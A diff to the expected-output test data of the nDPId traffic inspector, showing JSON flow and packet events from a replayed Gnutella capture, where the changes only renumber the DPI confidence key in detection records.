00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArgAAEAG3qdZSzQTCgACD7O6xBEAXroBd2GZhGAS\/\/+7lwAAAgQFtA=="} 
00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArkAAEAG56stQVcYCgACDz9JxBAAXcABhPHErWAS\/\/\/6VgAAAgQFtA=="} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAroAAEAG+PjPJqPkCgACDxp6xA8AYK4B6qFHeGAS\/\/9Z9wAAAgQFtA=="} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArsAAEAG2+NQjD+TCgACD3NpxA4AX7QBeWsMs2AS\/\/+J8QAAAgQFtA=="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":69360,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsArwAAEAGwoS2m\/LhCgACDzrcxDgAdioBOrzIf2AS\/\/+1wgAAAgQFtA=="} 
00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":69360,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":69360,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLcFAAIAGF4MKAAIPtpvy4cQ4Otw6vMh\/AHYqAlAQ+vDSjgAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69141,"flow_last_seen":69361,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":69361,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":69141,"flow_last_seen":69361,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":69361,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtFAAIAGDgYKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faJAAIAGiKUKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":70110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":70110,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R01AAIAGN+QKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} 
@@ -324,10 +324,10 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":71205,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71205,"pkt":"UlQAEjUCCAAn5uVZCABFAAA08yJAAIAG8AwKAAIPVtC0tcRJszsghBY3AAAAAIAC+vCuSgAAAgQFtAEDAwgBAQQC"} 00519{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":71216,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":71216,"pkt":"CAAn5uVZUlQAEjUCCABFwAA4AsYAAP8BoC4KAAICCgACDwMBntkAAAAARQAANGWZQAB\/BrMICgACD0xEis\/EN7AX1ucS7g=="} -00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.521641} +00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":372,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71216,"flow_last_seen":71216,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":71216,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.521641} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":71312,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71312,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAscAAEAGYHFW0LS1CgACD7M7xEkAehIBIIQWOGAS\/\/+\/xQAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":71312,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71312,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo8yNAAIAG8BcKAAIPVtC0tcRJszsghBY4AHoSAlAQ+vDckQAA"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":71313,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":71313,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.208.180.181","src_port":50249,"dst_port":45883,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71535,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.160.214.137","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":71535,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71535,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnYAAIARfQoKAAIPWKDWiXAJGMoAINufR05EED6TAQFUC1FLUlAGUk5BXS\/iNQlw"} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71535,"flow_last_seen":71535,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":71535,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.78.134.188","src_port":28681,"dst_port":49046,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -376,7 +376,7 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":71541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":71541,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02U0AAIAREUUKAAIPBbQ+ZHAJtTEAICo0R05EED6pAQFUC1FLUlAGUk5BXS\/iNQlw"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":71605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":71605,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAswAAEAGY0Nt1prYCgACDxjKxEgAewwBHNfF\/mAS\/\/+29AAAAgQFtA=="} 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":71605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":71605,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo5AxAAIAGAgYKAAIPbdaa2MRIGMoc18X+AHsMAlAQ+vDTwAAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":71608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":71205,"flow_last_seen":71608,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":71608,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.214.154.216","src_port":50248,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":411,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1xAAIAGzIMKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":412,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xtxAAIAGndcKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} 
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":72031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iq5AAIAGH9QKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} 
@@ -395,13 +395,13 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":72267,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72267,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnJAAIAGzTgKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":72462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72462,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAs8AAEAGtlsbXpo1CgACDxjKxEoAfQABvj80X2AS\/\/8GQwAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":72462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72462,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoalRAAIAGztkKAAIPG16aNcRKGMq+PzRfAH0AAlAQ+vAjDwAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72264,"flow_last_seen":72463,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":72463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72264,"flow_last_seen":72463,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":72463,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":72471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72471,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtEAAEAG0LF7yh9xCgACD004xEwAfvQBVTNjAWAS\/\/8ykwAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":72472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72472,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoVqZAAIAG\/N8KAAIPe8ofccRMTThVM2MBAH70AlAQ+vBPXwAA"} 
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72472,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72472,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":72595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":72595,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAtUAAEAGmJxn6GtkCgACD6n0xE0Af+4BiO6DFWAS\/\/9P9AAAAgQFtA=="} 
00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":72596,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":72596,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo0UVAAIAGSi8KAAIPZ+hrZMRNqfSI7oMVAH\/uAlAQ+vBswAAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72596,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72266,"flow_last_seen":72596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":72596,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72848,"flow_last_seen":72848,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":72848,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"170.254.19.6","src_port":28681,"dst_port":24180,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":72848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":72848,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XAwAAIARFJoKAAIPqv4TBnAJXnQAIAcER05EED6qAQFUC1FLUlAGUk5BXS\/iNQlw"} 